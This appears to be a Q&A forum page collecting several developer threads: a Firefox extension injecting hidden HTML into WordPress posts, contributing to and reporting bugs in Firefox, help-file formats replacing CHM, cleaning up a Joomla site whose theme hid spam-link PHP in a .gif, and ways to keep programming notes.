I recently installed a Firefox extension and noticed that it was doing something very odd in the background.
I'm a web developer and use Wordpress mainly. One day I was working on a page in WP admin and switched to the Text rather than Visual mode so I could edit some HTML. I noticed a load of junk html in there hidden using display:none
The class names rang a bell, it was the name of the extension I had installed several weeks previous
I immediately uninstalled the extension but of course it was too late. Since it was injecting code right into the text entry boxes in Wordpress, all that junk got saved with my pages. I had to weed through dozens and manually delete this junk, which in some cases had affected the layout.
I contacted the developers, and they gave me some rubbish about it being totally normal, everyone does this sort of thing, its within the Mozilla dev terms, and that it was a feature not a horrific Malware as I was putting forward.
In this case it was just html/css, but what if they were injecting JS/php etc, they could be causing all kinds of damage
I just wondered from a development perspective what peoples thoughts were. Is this legal?
Many thanks in advance
The best course of action is to spread awareness. I would not do here, but maybe write a detailed article explaining which extension it is, what it does, how, why it's bad, how to get rid of it, and alternatives.
Medium, your own blog, Hacker News and other social outlets will certainly be welcoming of such informations. The developers are very well aware of what they are doing so don't expect them to broadcast it and/or take action.
Be also sure to read their ToS again, see what you agreed to. If something seems suspicious you can talk to a lawyer or probably report them, altough this is beyond what I know.
I am a Mozilla Addon reviewer. Please report your findings as Abuse report and/or addon review (it will be read).
Related
I am trying to contribute to open source particularly Firefox(Mozilla), I have done my installation and set up but I have a challenge determining where to look in the codebase to find the file where a bugs occurs in order to propose a patch. I would greatly appreciate general guidance on how to proceed. This is my first time attempting to contribute to open source with Firefox.
Basically, upon seeing the bug as reported in Bugzilla(a website where mozilla bugs are reported), I am clueless on how to proceed from there.
welcome to SO!
I know that contributing to such a big codebase can sometimes feel overwhelming, but I can guarantee you that the Firefox devs really appreciate the efforts you are already putting (and will put!) in your contribution. So.. thanks for the help!
General tips
Firefox codebase is huge, complex and has many moving parts. Downloading and getting Firefox correctly built locally is already a big step forward, and will save you time later. If you haven't done that already, consider doing it!
Read the How To Contribute Code To Firefox documentation page. It gives a good overview of how a code contribution process looks like in Firefox.
Don't feel shy about asking questions! The bug on Bugzilla (or the github ticket) is usually a good place to ask specific questions or general directions on how to fix a bug in Firefox, and folks are generally friendly, inclusive and happy to support you support them!
a. If you don't receive a direct response within a few business days (usually 2-3) from somebody on the bug, chances are the notification got swallowed in the "immense sea of notifications, emails, messages"(tm) that devs receive. See the next section about reaching out.
How to find who to talk to?
Who knows about a specific part of Firefox or any Mozilla product? This could seem like an hard thing to figure out, but there's a few tips.
If the bug report is on Bugzilla, good people to talk to would be the Reporter (if they are a Mozilla contributor) or the Triage Owner.
Mentored bugs are bugs that were triaged by the dev teams and that were designated to introduce folks to the codebase. For this bugs, a "Mentor" is usually shown under "Assignee" in the "People" section of the bug. That's a good person to ask questions!
Mozilla publishes the list of folks who are responsible about components in Firefox. You can find who to talk to based on where the code is/the bug was filed and then consulting this page.
You can send direct request over Bugzilla to individuals, they are called "needinfo requests". After logging into Bugzilla, on the specific page of the bug you need information on, scroll to the bottom. Type your question in the "Add comment" section, tick the "Request information from" checkbox and either pick the role of the person you want to flag from the dropdown, or select "other" and paste an email address there (that you have identified using the previous points). If the person is on bugzilla, the text field will autocomplete and show the relevant person.
If all the above fails, you can rely synchronous communication and chat with the devs over here in the # developers channel.
How to find what code to change?
If it's not in the bug, ask the reporter or the person responsible of that section of code. For bugs marked as "mentored", ask the assigned Mentor!
If the bugzilla bug doesn't mention specific files and you want to find out yourself without reaching out, your best ally is Searchfox. You can type some keywords from the bug at the top of the page and wait for the results in the codebase to come in. This is highly effective! If the bug asks changing CSS files, for example, you could add a file filter like *.css in the top right.
Another pro-tip is looking at what other bugs in that same bugzilla product/component touched. You would find that by clicking on the arrow next to the component, then picking "Recently Fixed Bugs in This Component": it will show a list of fixed bugs, you can pick one or more, then look at the attachments.
Hope this helps!
Back in the old days, Help was not trivial but possible: generate some funky .rtf file with special tags, run it through a compiler, and you got a WinHelp file (.hlp) that actually works really well.
Then, Microsoft decided that WinHelp was not hip and cool anymore and switched to CHM, up to the point they actually axed WinHelp from Vista.
Now, CHM maybe nice, but everyone that tried to open a .chm file on the Network will know the nice "Navigation to the webpage was canceled" screen that is caused by security restrictions.
While there are ways to make CHM work off the network, this is hardly a good choice, because when a user presses the Help Button he wants help and not have to make some funky settings
Bottom Line: I find CHM absolutely unusable. But with WinHelp not being an option anymore either, I wonder what the alternatives are, especially when it comes to integrate with my Application (i.e. for WinHelp and CHM there are functions that allow you to directly jump to a topic)?
PDF has the disadvantage of requiring the Adobe Reader (or one of the more lightweight ones that not many people use). I could live with that seeing as this is kind of standard nowadays, but can you tell it reliably to jump to a given page/anchor?
HTML files seem to be the best choice, you then just have to deal with different browsers (CSS and stuff).
Edit: I am looking to create my own Help Files. As I am a fan of the "No Setup, Just Extract and Run" Philosophy, i had that problem many times in the past because many of my users will run it off the network, which causes exactly this problem.
So i am looking for a more robust and future-proof way to provide help to my users without having to code a different help system for each application i make.
CHM is a really nice format, but that Security Stuff makes it unusable, as a Help system is supposed to provide help to the user, not to generate even more problems.
Yep, at some point they want to add behaviour to their help files which makes it a security issue and guess what happens, the remedy being often worse than the threat.
Or it's too simple or too complicated and being replaced by something new without caring for backward compatibility.
If you want it really simple and build for the ages go for .TXT
You didn't specify what your apps are coded in so it depends.
If it's a web app, plain HTML would be the best choice, for a help file you don't need special features or javascript so being browser independant should be straightforward. But also for desktop apps HTML, on- or offline are often used with good results.
PDF is the other general solution, and yes you can jump to specific pages, see this answer. Every pc has (or should) one client or the other installed, I wouldn't worry about that. I myself never choose Acrobat Reader, faster, sompler and often better solutions are available, my favorite is Sumatra.
I'm sure .Net apps have their own help system (no experience here) and many languages have options to display tooltips, windows or pages with help either by pressing a hotkey (F1) or clicking some control dialog.
I use Firefox for about 90% of my overall browser usage experience and periodically discover bugs or strangeness in work, also from time to time I have suggestions for improvement.
So I think that it's useful for Firefox community to know about potential or actual problems. Is there such resource to create quick reports (I'm at work, for example, and haven't enough time for advanced conversations)? What is the easiest way to report bugs and suggest some new ideas? May be there is some addon for this purpose?
Thanks in advance.
Good question! Depending on the problem you are seeing, there are different strategies for efficiently reporting the issue. Efficiency in this case means the reduction of the time that passes from your report to actually get somebody to take a look at it (and then decide what's next).
Here's a set of ways you can use to get in touch with the community (disclaimer: I'm part of it):
Bugzilla: it's the one stop place for reporting bugs for Firefox. I know it's a bit cryptic at first, and there are plans to improve the bug reporting workflow. There's a comprehensive article on MDN that explains how to write a good bug report that's actually helpful. Don't get mislead by the word "bug": Bugzilla is also used to track the development workflow and discuss enhancements.
webcompat.com: if you're having problems with a particular website that doesn't get rendered properly, you could still write a bug report in Bugzilla. However, the webcompat website (still supported by Mozilla) is more suited for this kind of things. It also features a downloadable Firefox addon to speed up filing website compatibility issues.
Github: some components (Testpilot, ...) live on Github rather than in the central Mozilla repository. If you're experiencing issues with them, you could file an issue on the github page for the specific project.
irc.mozilla.org: (discontinued) this chat server allows to get in touch in real-time with the Mozilla community. There are several channels you can hang out in, even using a web-based IRC client. People are usually very willing to help. This is not the best place to report problems, but still a good place to raise awareness about your bug if it doesn't get triaged (i.e. assigned a priority and discussed) within a week or so.
chat.mozilla.org: as of May 2020, this replaced IRC and is the new recommended mechanism for synchronous communications. See the related wiki.
I know that's a lot of info, but it's easier than you think! If you feel like you don't know where to file bugs, just go to Bugzilla. Please do not hesitate to ask if you need more help and.. cheers for willing to report bugs!
Updated May 2020: Added Matrix and marked IRC as discontinued.
So, I've just started working with a new Joomla site, and something we've added has started hijacking various parts of the site and added links to various places we don't want. Unfortunately, I can't give out a link to the live site right now, but I can describe the problems:
In the footer, where it should say "Designed By: " and the name of the place we got our template from, it leaves the "Designed By:" but removes the name of the template author, and instead puts in two links (not giving the hijacker any more hits but here's the text of them), "online album" and "check whois"
When we hover over the site name, the alt text is set to "Forex Trading Home" which is most certainly not what it should be.
Finally, when you hover over the "Home" item in the main menu, a dropdown appears after a short delay, with a link to "cpanel reseller hosting" inside it.
Now, I'd like to get rid of these advertisements, but I've got no idea where they are coming from. If you guys know some commonly-hijacked files I can search in, or good debugging tricks to find them (I've tried FirePHP, but haven't had much success with it) I'd be much obliged. Unfortuantely, since a few people have been working on the site simultaneously, we're not really sure what extensions could have caused it (if that is in fact, the problem) - but all of them seemed ok, and came from the main Joomla extension site.
EDIT:
Here's a list of the modules I know were installed before we noticed the spam problems start happening:
EasyTemplate.
EasyTemplate - MultiPlugin
mod_picasaslideshow
Content - Picasa Album Embedding
Other than that, everything else was installed after the problems started, or was a theme that has since been uninstalled (and hence, I don't know what it is anymore). The theme that's on it now, I've looked at thoroughly, but is version of this Martial Arts Theme with a lot of modified images (and one change in the php from a .gif to a .png)
EDIT EDIT: So, still looking, but seems an older version of picasa2gallery (we had a new version at one point, but uninstalled it) had an LFI vulnerability. Perhaps that was the source. In any case, I think I'll be doing a full wipe, and just start over, really.
So, turns out the correct answer was "none of the above", not that I noticed that until after I erased everything to remove the hack.
Once I restored the theme, and nothing else, I noticed that the "hack" spam links were back, way too fast to even be an automated script.
That's when I discovered that there was a .gif file in the images directory that contained the "bad" PHP code to include the spam links. Ironically, the code they were using to make it was particularly bad, so at least I got a good laugh out of this long ordeal.
Moral of the story: Don't get themes from ThemZa, and if you do, be prepared to dig through them for cruft, if you like the way they look.
Your complete Joomla installation seems to be hacked, follow the guidelines what you should do now (re-installing and securing)
Check the server access logs. You'll most likely see accesses to a particular component (look for the com_* in the URI) that are excessive, or just out of place.
When this has happened to my sites it has been a particular component that hijackers are searching Google for (i.e. com_virtuemart was the last culprit) and then they attempt their exploit on the component hoping it is a flawed version.
If you can't positively identify and fix the hole they broke in through, it's likely the reinstall Tobias P. recommends is the only safe way. If somebody has access to files on that level, you have a big problem. You will need to identify which way they come in. This could have a multitude of reasons:
Somebody exploiting a Joomla security hole (or one in a plug-in)
Somebody having gained access to the FTP account through spying on a client computer
Somebody exploiting a weakness in the server software
this is most likely somebody exploiting a Joomla hole, and there's probably no reason to panic. But you definitely should find out, or do a reinstall. Maybe you'll find more specific help on the Joomla forums or with your ISP.
While you're at it, best change all FTP passwords too, just to make sure.
Good reading at Google: My site's been hacked - now what?
What do the clever programmers here do to keep track of handy programming tricks and useful information they pick up over their many years of experience? Things like useful compiler arguments, IDE short-cuts, clever code snippets, etc.
I sometimes find myself frustrated when looking up something that I used to know a year or two ago. My IE favorites probably represent a good chunk of the Internet in the late 1990s, so clearly that isn't effective (at least for me). Or am I just getting old?
So.. what do you do?
Two Things I do:
I blog about it - this allows me to go back and search my own blog.
We use the code snippet feature in Visual Studio.
Cheers.
I use:
Google Notebook - I take notes for projects, books I'm reading, etc
Delicious + Firefox plug in - Every time I see a good page I mark it.
Windows Journal (in tablet pc) - When I need to draw something and then copy/cut/paste it. I have more distractions here, the web is always very close :)
Small Moleskine paper notebook - Its always with me.
Big paper notebook - When I need more space to write and less distractions.
Obviously these are for all useful information, not just for snippets or tips and tricks.
Why not set up a Wiki?
If you are on windows, i know that ScrewTurn wiki is pretty simple to deploy on a desktop/laptop. No database to fuss around with.
Blog about it.
One of the nice side-effects of blogging is that if you use a sensible categorization or tagging system, it's quite easy to search for stuff within your blog. The fact that you wrote about it also makes it easier to remember problems you have encountered before ("hey, I blogged about that!").
That's a great benefit aside from, of course, being able to share this information publicly so that others might be able to find your solution to a particular problem using Google.
A number of people I know swear by Google Notebook
I send them to my gmail account, that way I have them where ever I go, and they can be put into appropriate folders for later.
I second the blog about it technique...even Jeff said that's a major reason he blogs.
Also, regarding the wiki idea, if you set one up at work, be sure to encourage your coworkers to do the same. When someone finds something of interest they can just write a little "article" explaining what it is and how to do it... that way, not only are your own things easily available and quickly searchable, but you'll often find out things you never knew from other people in your group. That way it benefits everyone not just you.
I agree with emailing, the wiki and the blog. Emailing is the most useful. If you can't use GMail and you're on windows, install a desktop search utility (Windows search, Google Desktop, Copernic, etc)
I also like to jot it into a textfile and save it in my documents folder. Whatever desktop search utility you use will be able to find it easily. e.g.
//print spool stop.notes.txt
If the printer spooler stops, start it again by
- Services > Provision Networks > Restart Service
tags: printer provision no printer spooler cannot print remote desktop
Subscribe in Google Reader and then search later.
At my last place of work they wouldn't let me set up a wiki or anything - so I just made various word documents full of tips and instructions and gave that to my successor when I left.
Now though I'd use a private wiki, or maybe a blog.
For many years I've kept a Word doc named Knowledgebase.doc that contains all my notes with a decent table of contents. I like to keep everything in one searchable doc.
I use a sync tool to make sure the file is copied to all the machines I want it on.
I use TiddlyWiki stored in my DropBox account. Although, recently, Evernote is getting my atention; it has a really useful feature: you send a twitter direct message to evernote user (myen) and it adds a note with your message (a really quick way to add notes or URL's for post-processing). Imagine, you can use a command-line twitter client to create notes! (or any twitter client). I really like this feature.